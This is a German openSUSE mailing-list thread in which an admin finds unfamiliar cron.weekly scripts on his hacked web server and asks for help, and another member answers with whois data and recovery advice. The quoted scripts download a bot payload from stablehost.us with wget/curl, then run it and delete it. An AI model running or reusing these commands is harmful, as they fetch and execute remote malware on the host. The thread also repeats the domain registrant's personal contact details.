Hallo Jörg, ich habe mir das schon gedacht, als ich am 28.11.2014 nicht mehr aus der Ferne auf meinen Server zugreifen konnte. Da wurden verschiedene Dateien verändert. Nach einem Neustart ging aber alles wieder. Ich bin dabei einen neuen Server auf OS13.1 aufzusetzen. Was sollte ich zusätzlich beachten, damit sowas nicht mehr passiert? Passwort werde ich auf jeden Fall ändern. Was sonst? Was bedeuten diese Kommandos in der logrotate? Wget kenne ich nicht richtig. Gruss Bernd Am 09.12.2014 um 15:03 schrieb Joerg Thuemmler:
Am 09.12.2014 14:51, schrieb Bernhard Junk:
Hallo, habe hier auf meinem Webserver in der /etc/cron.weekly einen Eintrag der nicht von mir stammt. Ich glaube, ich bin da gehackt worden. Ich möchte diesen Eintrag löschen aber es geht nicht: Keine Berechtigung obwohl die Rechte als root:root stehen. Wie kann ich diesen Eintrag löschen zumal es so aussieht, als ob da Informationen weitergegeben werden. Ich habe das File mal aufgeführt.
File 00logrotate #!/bin/sh wget http://stablehost.us/bots/regular.bot -O /tmp/sh curl -o /tmp/sh http://stablehost.us/bots/regular.bot sh /tmp/sh;rm -rf /tmp/sh
Das lies sich löschen
File logrotater
#!/bin/sh wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh sh /tmp/sh;rm /tmp/sh
Das lässt sich nicht löschen.
Kann mir jemand erklären, was das bedeutet?
Gruss Bernd
Hi,
#whois stablehost.us
Domain Name: STABLEHOST.US Domain ID: D26827113-US Sponsoring Registrar: INTERNET.BS CORP. Sponsoring Registrar IANA ID: 814 Registrar URL (registration services): http://www.internet.bs Domain Status: clientTransferProhibited Variant: STABLEHOST.US Registrant ID: INTE2WRL0UZK4FSB Registrant Name: sben koutsoukis Registrant Address1: 2 STAROSLOBODSKIY PEREULOK Registrant City: moscow Registrant Postal Code: 089 Registrant Country: Russian Federation Registrant Country Code: RU Registrant Phone Number: +7.4959384737 Registrant Email: bluejeans980@mail.ru
also ich würde in diesem Falle:
1. das Netzwerkkabel erstmal rausziehen 2. die Platte(n) ausbauen 3. das System auf leeren Platten neu installieren 4. hoffen, dass ich saubere Backups habe, diese genau prüfen, ehe ich sie als absolut rechtlosester User mounten würde
Ich weiß nicht, was Du Dir da eingefangen hast (und vor allem, wie), aber ich würde sagen, es sieht nicht gut aus. Kann sein, ich sehe zu schwarz, vielleicht reicht es ja, eine Knoppix zu booten und den Kram von da zu löschen, aber ich denke, wenn Du es regulär im System nicht mehr löschen kannst (als root), dann ist root nicht mehr root und jemand anderes bei Dir root... ;-(
cu jth
-- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um den Listen Administrator zu erreichen, schicken Sie eine Mail an: opensuse-de+owner@opensuse.org